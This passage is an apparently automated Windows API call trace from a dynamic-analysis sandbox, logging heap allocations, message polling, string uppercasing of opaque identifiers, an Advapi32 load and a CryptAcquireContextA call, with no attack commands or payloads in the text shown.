hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0157.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0157.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0157.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0157.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0157.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0157.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0157.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.071] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.072] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0157.072] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.072] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0157.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.073] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0157.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0157.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.074] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0157.074] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0157.074] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0157.075] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0157.075] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.075] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0157.075] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0157.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0157.076] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0157.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0157.076] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.076] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0157.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0157.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0157.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7040, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0157.076] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf330) returned 1 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75380 [0157.078] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.078] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0157.078] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0157.078] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0157.079] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0157.079] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.079] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0157.079] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.079] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.079] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.079] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0157.079] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0157.079] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.079] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0157.079] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.080] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0157.080] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.080] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0157.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 